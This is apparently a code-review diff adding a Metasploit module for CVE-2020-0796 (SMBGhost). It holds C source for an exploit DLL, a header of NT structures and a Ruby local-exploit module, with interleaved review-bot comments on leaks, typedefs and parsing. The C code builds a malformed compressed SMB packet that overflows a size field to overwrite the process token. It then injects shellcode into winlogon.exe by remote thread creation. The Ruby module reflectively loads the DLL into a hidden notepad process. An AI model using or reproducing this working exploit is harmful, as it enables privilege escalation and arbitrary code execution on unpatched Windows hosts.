0x02, 0x00, /* compression algorithm count */
|
||||
0x00, 0x00, /* padding */
|
||||
0x01, 0x00, 0x00, 0x00, /* flags */
|
||||
0x02, 0x00, /* LZ77 */
|
||||
0x03, 0x00, /* LZ77+Huffman */
|
||||
0x00, 0x00, 0x00, 0x00, /* padding */
|
||||
0x00, 0x00, 0x00, 0x00
|
||||
};
|
||||
|
||||
if ((err = send(sock, (const char*)buf, sizeof(buf), 0)) != SOCKET_ERROR) {
|
||||
recv(sock, response, sizeof(response), 0);
|
||||
}
|
||||
|
||||
return err;
|
||||
}
|
||||
|
||||
int send_compressed(SOCKET sock, unsigned char* buffer, ULONG len) {
|
||||
int err = 0;
|
||||
char response[8] = { 0 };
|
||||
|
||||
const uint8_t buf[] = {
|
||||
/* NetBIOS Wrapper */
|
||||
0x00,
|
||||
0x00, 0x00, 0x33,
|
||||
|
||||
/* SMB Header */
|
||||
0xFC, 0x53, 0x4D, 0x42, /* protocol id */
|
||||
0xFF, 0xFF, 0xFF, 0xFF, /* original decompressed size, trigger arithmetic overflow */
|
||||
0x02, 0x00, /* compression algorithm, LZ77 */
|
||||
0x00, 0x00, /* flags */
|
||||
0x10, 0x00, 0x00, 0x00, /* offset */
|
||||
};
|
||||
|
||||
uint8_t* packet = (uint8_t*)malloc(sizeof(buf) + 0x10 + len);
|
||||
if (packet == NULL) {
|
||||
return error_exit(sock);
|
||||
}
|
||||
|
||||
memcpy(packet, buf, sizeof(buf));
|
||||
*(uint64_t*)(packet + sizeof(buf)) = 0x1FF2FFFFBC;
|
||||
*(uint64_t*)(packet + sizeof(buf) + 0x8) = 0x1FF2FFFFBC;
|
||||
memcpy(packet + sizeof(buf) + 0x10, buffer, len);
|
||||
|
||||
if ((err = send(sock, (const char*)packet, sizeof(buf) + 0x10 + len, 0)) != SOCKET_ERROR) {
|
||||
recv(sock, response, sizeof(response), 0);
|
||||
}
|
||||
|
||||
free(packet);
|
||||
return err;
|
||||
}
|
||||
|
||||
void inject(PMSF_PAYLOAD pMsfPayload) {
|
||||
PROCESSENTRY32 entry;
|
||||
entry.dwSize = sizeof(PROCESSENTRY32);
|
||||
|
||||
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
||||
|
||||
int pid = -1;
|
||||
if (Process32First(snapshot, &entry) == TRUE) {
|
||||
while (Process32Next(snapshot, &entry) == TRUE) {
|
||||
if (lstrcmpiA(entry.szExeFile, "winlogon.exe") == 0) {
|
||||
pid = entry.th32ProcessID;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
CloseHandle(snapshot);
|
||||
|
||||
if (pid < 0) {
|
||||
return;
|
||||
}
|
||||
|
||||
HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
|
||||
if (hProc == NULL) {
|
||||
return;
|
||||
}
|
||||
|
||||
LPVOID lpMem = VirtualAllocEx(hProc, NULL, pMsfPayload->dwSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (lpMem == NULL) {
|
||||
return;
|
||||
}
|
||||
if (!WriteProcessMemory(hProc, lpMem, &pMsfPayload->cPayloadData, pMsfPayload->dwSize, 0)) {
|
||||
return;
|
||||
}
|
||||
if (!CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)lpMem, 0, 0, 0)) {
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
||||
DWORD exploit(PMSF_PAYLOAD pMsfPayload) {
|
||||
WORD wVersionRequested = MAKEWORD(2, 2);
|
||||
WSADATA wsaData = { 0 };
|
||||
SOCKET sock = INVALID_SOCKET;
|
||||
uint64_t ktoken = 0;
|
||||
|
||||
int err = 0;
|
||||
|
||||
if ((err = WSAStartup(wVersionRequested, &wsaData)) != 0) {
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2) {
|
||||
WSACleanup();
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
||||
if (sock == INVALID_SOCKET) {
|
||||
WSACleanup();
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
SOCKADDR_IN client;
|
||||
client.sin_family = AF_INET;
|
||||
client.sin_port = htons(445);
|
||||
InetPton(AF_INET, "127.0.0.1", &client.sin_addr);
|
||||
|
||||
if (connect(sock, (SOCKADDR*)&client, sizeof(client)) == SOCKET_ERROR) {
|
||||
return error_exit(sock);
|
||||
}
|
||||
|
||||
if (send_negotiation(sock) == SOCKET_ERROR) {
|
||||
return error_exit(sock);
|
||||
}
|
||||
|
||||
ULONG buffer_size = 0x1110;
|
||||
UCHAR* buffer = (UCHAR*)malloc(buffer_size);
|
||||
if (buffer == NULL) {
|
||||
return error_exit(sock);
|
||||
}
|
||||
|
||||
ktoken = get_process_token();
|
||||
if (ktoken == 0) {
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
HMODULE ntdll = GetModuleHandle("ntdll.dll");
|
||||
if (ntdll == NULL) {
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
fpRtlGetCompressionWorkSpaceSize RtlGetCompressionWorkSpaceSize = (fpRtlGetCompressionWorkSpaceSize)GetProcAddress(ntdll, "RtlGetCompressionWorkSpaceSize");
|
||||
if (RtlGetCompressionWorkSpaceSize == NULL) {
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
fpRtlCompressBuffer RtlCompressBuffer = (fpRtlCompressBuffer)GetProcAddress(ntdll, "RtlCompressBuffer");
|
||||
if (RtlCompressBuffer == NULL) {
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
memset(buffer, 'A', 0x1108);
|
||||
*(uint64_t*)(buffer + 0x1108) = ktoken + 0x40; /* where we want to write */
|
||||
|
||||
ULONG CompressBufferWorkSpaceSize = 0;
|
||||
ULONG CompressFragmentWorkSpaceSize = 0;
|
||||
err = RtlGetCompressionWorkSpaceSize(COMPRESSION_FORMAT_XPRESS,
|
||||
&CompressBufferWorkSpaceSize, &CompressFragmentWorkSpaceSize);
|
||||
|
||||
if (err != STATUS_SUCCESS) {
|
||||
return error_exit(sock);
|
||||
}
|
||||
|
||||
ULONG FinalCompressedSize;
|
||||
UCHAR compressed_buffer[64];
|
||||
LPVOID lpWorkSpace = malloc(CompressBufferWorkSpaceSize);
|
||||
if (lpWorkSpace == NULL) {
|
||||
return error_exit(sock);
|
||||
}
|
||||
|
||||
err = RtlCompressBuffer(COMPRESSION_FORMAT_XPRESS, buffer, buffer_size,
|
||||
compressed_buffer, sizeof(compressed_buffer), 4096, &FinalCompressedSize, lpWorkSpace);
|
||||
|
||||
if (err != STATUS_SUCCESS) {
|
||||
free(lpWorkSpace);
|
||||
return error_exit(sock);
|
||||
}
|
||||
|
||||
if (send_compressed(sock, compressed_buffer, FinalCompressedSize) == SOCKET_ERROR) {
|
||||
return error_exit(sock);
|
||||
}
|
||||
|
||||
inject(pMsfPayload);
|
||||
|
||||
WSACleanup();
|
||||
return EXIT_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
|
||||
{
|
||||
BOOL bReturnValue = TRUE;
|
||||
switch (dwReason)
|
||||
{
|
||||
case DLL_QUERY_HMODULE:
|
||||
hAppInstance = hinstDLL;
|
||||
if (lpReserved != NULL)
|
||||
{
|
||||
*(HMODULE*)lpReserved = hAppInstance;
|
||||
}
|
||||
break;
|
||||
case DLL_PROCESS_ATTACH:
|
||||
hAppInstance = hinstDLL;
|
||||
exploit((PMSF_PAYLOAD)lpReserved);
|
||||
break;
|
||||
case DLL_PROCESS_DETACH:
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
break;
|
||||
}
|
||||
return bReturnValue;
|
||||
}
|
|
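Review bot: In get_process_token, OpenProcess returns NULL on failure rather than INVALID_HANDLE_VALUE, so `if (proc == INVALID_HANDLE_VALUE)` never fires, and the OpenProcessToken result is ignored, so `token` can reach get_handle_addr uninitialized; check for NULL, test the OpenProcessToken return value, and CloseHandle both handles once the object address has been read. Related resource handling: the do/while in get_handle_addr calls GlobalAlloc on every retry without freeing the previous buffer and never frees the final one (GlobalFree before retrying and after the scan), `ptrs[1000]` is unused, error_exit takes the socket but never calls closesocket, the `return EXIT_FAILURE` paths in exploit after the socket exists skip both closesocket and WSACleanup, and `buffer`, `lpWorkSpace` and the hProc handle in inject are never released. The `for` loop compares `int i` against the ULONG_PTR NumberOfHandles; use a ULONG_PTR index to avoid the signed/unsigned mix under TreatWarningAsError. Finally, two dialect comments are wrong: `0x24, 0x02 /* SMB 2.2.3 */` is 0x0224 (SMB 2.2.4) and `0x10, 0x03 /* SMB 3.0.1 */` is 0x0310 (SMB 3.1.0), and "hash algorith" is missing its final letter.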
@ -0,0 +1,245 @@
|
|||
#ifndef _EXPLOIT_H
|
||||
#define _EXPLOIT_H
|
||||
|
||||
#include <windows.h>
|
||||
|
||||
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
|
||||
PVOID Object;
|
||||
ULONG_PTR UniqueProcessId;
|
||||
ULONG_PTR HandleValue;
|
||||
ULONG GrantedAccess;
|
||||
USHORT CreatorBackTraceIndex;
|
||||
USHORT ObjectTypeIndex;
|
||||
ULONG HandleAttributes;
|
||||
ULONG Reserved;
|
||||
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
|
||||
|
||||
typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
|
||||
ULONG_PTR NumberOfHandles;
|
||||
ULONG_PTR Reserved;
|
||||
SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
|
||||
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
|
||||
|
||||
typedef enum _SYSTEM_INFORMATION_CLASS {
|
||||
SystemBasicInformation = 0,
|
||||
SystemProcessorInformation = 1,
|
||||
SystemPerformanceInformation = 2,
|
||||
SystemTimeOfDayInformation = 3,
|
||||
SystemPathInformation = 4,
|
||||
SystemProcessInformation = 5,
|
||||
SystemCallCountInformation = 6,
|
||||
SystemDeviceInformation = 7,
|
||||
SystemProcessorPerformanceInformation = 8,
|
||||
SystemFlagsInformation = 9,
|
||||
SystemCallTimeInformation = 10,
|
||||
SystemModuleInformation = 11,
|
||||
SystemLocksInformation = 12,
|
||||
SystemStackTraceInformation = 13,
|
||||
SystemPagedPoolInformation = 14,
|
||||
SystemNonPagedPoolInformation = 15,
|
||||
SystemHandleInformation = 16,
|
||||
SystemObjectInformation = 17,
|
||||
SystemPageFileInformation = 18,
|
||||
SystemVdmInstemulInformation = 19,
|
||||
SystemVdmBopInformation = 20,
|
||||
SystemFileCacheInformation = 21,
|
||||
SystemPoolTagInformation = 22,
|
||||
SystemInterruptInformation = 23,
|
||||
SystemDpcBehaviorInformation = 24,
|
||||
SystemFullMemoryInformation = 25,
|
||||
SystemLoadGdiDriverInformation = 26,
|
||||
SystemUnloadGdiDriverInformation = 27,
|
||||
SystemTimeAdjustmentInformation = 28,
|
||||
SystemSummaryMemoryInformation = 29,
|
||||
SystemMirrorMemoryInformation = 30,
|
||||
SystemPerformanceTraceInformation = 31,
|
||||
SystemObsolete0 = 32,
|
||||
SystemExceptionInformation = 33,
|
||||
SystemCrashDumpStateInformation = 34,
|
||||
SystemKernelDebuggerInformation = 35,
|
||||
SystemContextSwitchInformation = 36,
|
||||
SystemRegistryQuotaInformation = 37,
|
||||
SystemExtendServiceTableInformation = 38,
|
||||
SystemPrioritySeperation = 39,
|
||||
SystemVerifierAddDriverInformation = 40,
|
||||
SystemVerifierRemoveDriverInformation = 41,
|
||||
SystemProcessorIdleInformation = 42,
|
||||
SystemLegacyDriverInformation = 43,
|
||||
SystemCurrentTimeZoneInformation = 44,
|
||||
SystemLookasideInformation = 45,
|
||||
SystemTimeSlipNotification = 46,
|
||||
SystemSessionCreate = 47,
|
||||
SystemSessionDetach = 48,
|
||||
SystemSessionInformation = 49,
|
||||
SystemRangeStartInformation = 50,
|
||||
SystemVerifierInformation = 51,
|
||||
SystemVerifierThunkExtend = 52,
|
||||
SystemSessionProcessInformation = 53,
|
||||
SystemLoadGdiDriverInSystemSpace = 54,
|
||||
SystemNumaProcessorMap = 55,
|
||||
SystemPrefetcherInformation = 56,
|
||||
SystemExtendedProcessInformation = 57,
|
||||
SystemRecommendedSharedDataAlignment = 58,
|
||||
SystemComPlusPackage = 59,
|
||||
SystemNumaAvailableMemory = 60,
|
||||
SystemProcessorPowerInformation = 61,
|
||||
SystemEmulationBasicInformation = 62,
|
||||
SystemEmulationProcessorInformation = 63,
|
||||
SystemExtendedHandleInformation = 64,
|
||||
SystemLostDelayedWriteInformation = 65,
|
||||
SystemBigPoolInformation = 66,
|
||||
SystemSessionPoolTagInformation = 67,
|
||||
SystemSessionMappedViewInformation = 68,
|
||||
SystemHotpatchInformation = 69,
|
||||
SystemObjectSecurityMode = 70,
|
||||
SystemWatchdogTimerHandler = 71,
|
||||
SystemWatchdogTimerInformation = 72,
|
||||
SystemLogicalProcessorInformation = 73,
|
||||
SystemWow64SharedInformationObsolete = 74,
|
||||
SystemRegisterFirmwareTableInformationHandler = 75,
|
||||
SystemFirmwareTableInformation = 76,
|
||||
SystemModuleInformationEx = 77,
|
||||
SystemVerifierTriageInformation = 78,
|
||||
SystemSuperfetchInformation = 79,
|
||||
SystemMemoryListInformation = 80,
|
||||
SystemFileCacheInformationEx = 81,
|
||||
SystemThreadPriorityClientIdInformation = 82,
|
||||
SystemProcessorIdleCycleTimeInformation = 83,
|
||||
SystemVerifierCancellationInformation = 84,
|
||||
SystemProcessorPowerInformationEx = 85,
|
||||
SystemRefTraceInformation = 86,
|
||||
SystemSpecialPoolInformation = 87,
|
||||
SystemProcessIdInformation = 88,
|
||||
SystemErrorPortInformation = 89,
|
||||
SystemBootEnvironmentInformation = 90,
|
||||
SystemHypervisorInformation = 91,
|
||||
SystemVerifierInformationEx = 92,
|
||||
SystemTimeZoneInformation = 93,
|
||||
SystemImageFileExecutionOptionsInformation = 94,
|
||||
SystemCoverageInformation = 95,
|
||||
SystemPrefetchPatchInformation = 96,
|
||||
SystemVerifierFaultsInformation = 97,
|
||||
SystemSystemPartitionInformation = 98,
|
||||
SystemSystemDiskInformation = 99,
|
||||
SystemProcessorPerformanceDistribution = 100,
|
||||
SystemNumaProximityNodeInformation = 101,
|
||||
SystemDynamicTimeZoneInformation = 102,
|
||||
SystemCodeIntegrityInformation = 103,
|
||||
SystemProcessorMicrocodeUpdateInformation = 104,
|
||||
SystemProcessorBrandString = 105,
|
||||
SystemVirtualAddressInformation = 106,
|
||||
SystemLogicalProcessorAndGroupInformation = 107,
|
||||
SystemProcessorCycleTimeInformation = 108,
|
||||
SystemStoreInformation = 109,
|
||||
SystemRegistryAppendString = 110,
|
||||
SystemAitSamplingValue = 111,
|
||||
SystemVhdBootInformation = 112,
|
||||
SystemCpuQuotaInformation = 113,
|
||||
SystemNativeBasicInformation = 114,
|
||||
SystemErrorPortTimeouts = 115,
|
||||
SystemLowPriorityIoInformation = 116,
|
||||
SystemBootEntropyInformation = 117,
|
||||
SystemVerifierCountersInformation = 118,
|
||||
SystemPagedPoolInformationEx = 119,
|
||||
SystemSystemPtesInformationEx = 120,
|
||||
SystemNodeDistanceInformation = 121,
|
||||
SystemAcpiAuditInformation = 122,
|
||||
SystemBasicPerformanceInformation = 123,
|
||||
SystemQueryPerformanceCounterInformation = 124,
|
||||
SystemSessionBigPoolInformation = 125,
|
||||
SystemBootGraphicsInformation = 126,
|
||||
SystemScrubPhysicalMemoryInformation = 127,
|
||||
SystemBadPageInformation = 128,
|
||||
SystemProcessorProfileControlArea = 129,
|
||||
SystemCombinePhysicalMemoryInformation = 130,
|
||||
SystemEntropyInterruptTimingInformation = 131,
|
||||
SystemConsoleInformation = 132,
|
||||
SystemPlatformBinaryInformation = 133,
|
||||
SystemPolicyInformation = 134,
|
||||
SystemHypervisorProcessorCountInformation = 135,
|
||||
SystemDeviceDataInformation = 136,
|
||||
SystemDeviceDataEnumerationInformation = 137,
|
||||
SystemMemoryTopologyInformation = 138,
|
||||
SystemMemoryChannelInformation = 139,
|
||||
SystemBootLogoInformation = 140,
|
||||
SystemProcessorPerformanceInformationEx = 141,
|
||||
SystemSpare0 = 142,
|
||||
SystemSecureBootPolicyInformation = 143,
|
||||
SystemPageFileInformationEx = 144,
|
||||
SystemSecureBootInformation = 145,
|
||||
SystemEntropyInterruptTimingRawInformation = 146,
|
||||
SystemPortableWorkspaceEfiLauncherInformation = 147,
|
||||
SystemFullProcessInformation = 148,
|
||||
SystemKernelDebuggerInformationEx = 149,
|
||||
SystemBootMetadataInformation = 150,
|
||||
SystemSoftRebootInformation = 151,
|
||||
SystemElamCertificateInformation = 152,
|
||||
SystemOfflineDumpConfigInformation = 153,
|
||||
SystemProcessorFeaturesInformation = 154,
|
||||
SystemRegistryReconciliationInformation = 155,
|
||||
SystemEdidInformation = 156,
|
||||
SystemManufacturingInformation = 157,
|
||||
SystemEnergyEstimationConfigInformation = 158,
|
||||
SystemHypervisorDetailInformation = 159,
|
||||
SystemProcessorCycleStatsInformation = 160,
|
||||
SystemVmGenerationCountInformation = 161,
|
||||
SystemTrustedPlatformModuleInformation = 162,
|
||||
SystemKernelDebuggerFlags = 163,
|
||||
SystemCodeIntegrityPolicyInformation = 164,
|
||||
SystemIsolatedUserModeInformation = 165,
|
||||
SystemHardwareSecurityTestInterfaceResultsInformation = 166,
|
||||
SystemSingleModuleInformation = 167,
|
||||
SystemAllowedCpuSetsInformation = 168,
|
||||
SystemDmaProtectionInformation = 169,
|
||||
SystemInterruptCpuSetsInformation = 170,
|
||||
SystemSecureBootPolicyFullInformation = 171,
|
||||
SystemCodeIntegrityPolicyFullInformation = 172,
|
||||
SystemAffinitizedInterruptProcessorInformation = 173,
|
||||
SystemRootSiloInformation = 174,
|
||||
SystemCpuSetInformation = 175,
|
||||
SystemCpuSetTagInformation = 176,
|
||||
SystemWin32WerStartCallout = 177,
|
||||
SystemSecureKernelProfileInformation = 178,
|
||||
SystemCodeIntegrityPlatformManifestInformation = 179,
|
||||
SystemInterruptSteeringInformation = 180,
|
||||
SystemSupportedProcessorArchitectures = 181,
|
||||
SystemMemoryUsageInformation = 182,
|
||||
SystemCodeIntegrityCertificateInformation = 183,
|
||||
SystemPhysicalMemoryInformation = 184,
|
||||
SystemControlFlowTransition = 185,
|
||||
SystemKernelDebuggingAllowed = 186,
|
||||
SystemActivityModerationExeState = 187,
|
||||
SystemActivityModerationUserSettings = 188,
|
||||
SystemCodeIntegrityPoliciesFullInformation = 189,
|
||||
SystemCodeIntegrityUnlockInformation = 190,
|
||||
SystemIntegrityQuotaInformation = 191,
|
||||
SystemFlushInformation = 192,
|
||||
SystemProcessorIdleMaskInformation = 193,
|
||||
SystemSecureDumpEncryptionInformation = 194,
|
||||
SystemWriteConstraintInformation = 195,
|
||||
SystemKernelVaShadowInformation = 196,
|
||||
SystemHypervisorSharedPageInformation = 197,
|
||||
SystemFirmwareBootPerformanceInformation = 198,
|
||||
SystemCodeIntegrityVerificationInformation = 199,
|
||||
SystemFirmwarePartitionInformation = 200,
|
||||
SystemSpeculationControlInformation = 201,
|
||||
SystemDmaGuardPolicyInformation = 202,
|
||||
SystemEnclaveLaunchControlInformation = 203,
|
||||
SystemWorkloadAllowedCpuSetsInformation = 204,
|
||||
SystemCodeIntegrityUnlockModeInformation = 205,
|
||||
SystemLeapSecondInformation = 206,
|
||||
SystemFlags2Information = 207,
|
||||
SystemSecurityModelInformation = 208,
|
||||
SystemCodeIntegritySyntheticCacheInformation = 209,
|
||||
MaxSystemInfoClass
|
||||
} SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS;
|
||||
|
||||
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
|
||||
|
||||
typedef ULONG NTSTATUS;
|
||||
|
||||
typedef NTSTATUS(WINAPI* fpRtlGetCompressionWorkSpaceSize)(USHORT, PULONG, PULONG);
|
||||
typedef NTSTATUS(WINAPI* fpRtlCompressBuffer)(USHORT, PUCHAR, ULONG, PUCHAR, ULONG, ULONG, PULONG, PVOID);
|
||||
typedef NTSTATUS(WINAPI* fpNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);
|
||||
|
||||
#endif
|
|
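Review bot: `typedef ULONG NTSTATUS;` makes NTSTATUS unsigned, whereas the Windows SDK defines it as a signed LONG so that `NT_SUCCESS`-style `>= 0` checks work and error codes in the 0xC0000000 range compare as negative; it will also conflict with the SDK typedef if winternl.h or ntstatus.h is ever included alongside this header. Use `typedef LONG NTSTATUS;` and place it above the `#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)` that casts to it. The full SYSTEM_INFORMATION_CLASS enum also reuses the name winternl.h declares, which is a redefinition error if both headers meet; trimming it to the entries this code needs, or renaming it, avoids that. Minor: the guard `_EXPLOIT_H` is a reserved identifier (leading underscore plus uppercase); `EXPLOIT_H` is the safe spelling.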
@ -0,0 +1,133 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::Process
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
include Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info, {
|
||||
'Name' => 'SMBv3 Compression Buffer Overflow',
|
||||
'Description' => %q{
|
||||
A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to
|
||||
execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself
|
||||
before injecting a payload into winlogon.exe.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Daniel García Gutiérrez', # original LPE exploit
|
||||
'Manuel Blanco Parajón', # original LPE exploit
|
||||
'Spencer McIntyre' # metasploit module
|
||||
],
|
||||
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||
'Platform' => 'win',
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
#[ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ],
|
||||
[ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2020-0796' ],
|
||||
[ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ],
|
||||
[ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ]
|
||||
],
|
||||
'DisclosureDate' => '2020-03-13',
|
||||
'DefaultTarget' => 0,
|
||||
'AKA' => [ 'SMBGhost' ],
|
||||
'Notes' =>
|
||||
{
|
||||
'Stability' => [ CRASH_OS_RESTARTS, ],
|
||||
'Reliability' => [ REPEATABLE_SESSION, ],
|
||||
},
|
||||
}))
|
||||
end
|
||||
|
||||
def check
|
||||
sysinfo_value = sysinfo["OS"]
|
||||
|
||||
if sysinfo_value !~ /windows/i
|
||||
# Non-Windows systems are definitely not affected.
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
|
||||
vprint_status("Windows Build Number = #{build_num}")
|
||||
# see https://docs.microsoft.com/en-us/windows/release-information/
|
||||
unless sysinfo_value =~ /10/ && (build_num >= 18362 && build_num <= 18363)
|
||||
print_error('The exploit only supports Windows 10 versions 1903 - 1909')
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
disable_compression = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters","DisableCompression")
|
||||
if !disable_compression.nil? && disable_compression != 0
|
||||
print_error('The exploit requires compression to be enabled')
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
CheckCode::Appears
|
||||
end
|
||||
|
||||
def exploit
|
||||
# NOTE: Automatic check is implemented by the AutoCheck mixin
|
||||
super
|
||||
|
||||
if is_system?
|
||||
fail_with(Failure::None, 'Session is already elevated')
|
||||
end
|
||||
|
||||
if sysinfo["Architecture"] =~ /wow64/i
|
||||
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
|
||||
elsif sysinfo["Architecture"] == ARCH_X64 && target.arch.first == ARCH_X86
|
||||
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
|
||||
elsif sysinfo["Architecture"] == ARCH_X86 && target.arch.first == ARCH_X64
|
||||
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
|
||||
end
|
||||
|
||||
print_status('Launching notepad to host the exploit...')
|
||||
notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
|
||||
begin
|
||||
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
|
||||
print_good("Process #{process.pid} launched.")
|
||||
rescue Rex::Post::Meterpreter::RequestError
|
||||
# Reader Sandbox won't allow to create a new process:
|
||||
# stdapi_sys_process_execute: Operation failed: Access is denied.
|
||||
print_error('Operation failed. Trying to elevate the current process...')
|
||||
process = client.sys.process.open
|
||||
end
|
||||
|
||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0796', 'CVE-2020-0796.x64.dll')
|
||||
library_path = ::File.expand_path(library_path)
|
||||
|
||||
print_status("Injecting exploit into #{process.pid}...")
|
||||
exploit_mem, offset = inject_dll_into_process(process, library_path)
|
||||
|
||||
print_status("Exploit injected. Injecting payload into #{process.pid}...")
|
||||
encoded_payload = payload.encoded
|
||||
payload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload)
|
||||
|
||||
# invoke the exploit, passing in the address of the payload that
|
||||
# we want invoked on successful exploitation.
|
||||
print_status('Payload injected. Executing exploit...')
|
||||
process.thread.create(exploit_mem + offset, payload_mem)
|
||||
|
||||
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
|
||||
end
|
||||
end
|
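Review bot: in `check`, `sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i` indexes the whole match rather than the capture group it defines, and raises NoMethodError on nil when the OS string contains no such alphanumeric run, turning a check failure into an exception; something like `m = sysinfo_value.match(/Build (\d+)/)`, `return CheckCode::Unknown unless m`, `build_num = m[1].to_i` states the intent and fails safely. Separately, `'Arch' => [ ARCH_X86, ARCH_X64 ]` and the x86/x64 mismatch branches in `exploit` are dead while the only target is x64 and the injected library is hard-coded to `CVE-2020-0796.x64.dll`; either drop ARCH_X86 or pick the DLL name from `target.arch`. The `# Reader Sandbox won't allow to create a new process` comment looks copied from another module; this code launches notepad.exe.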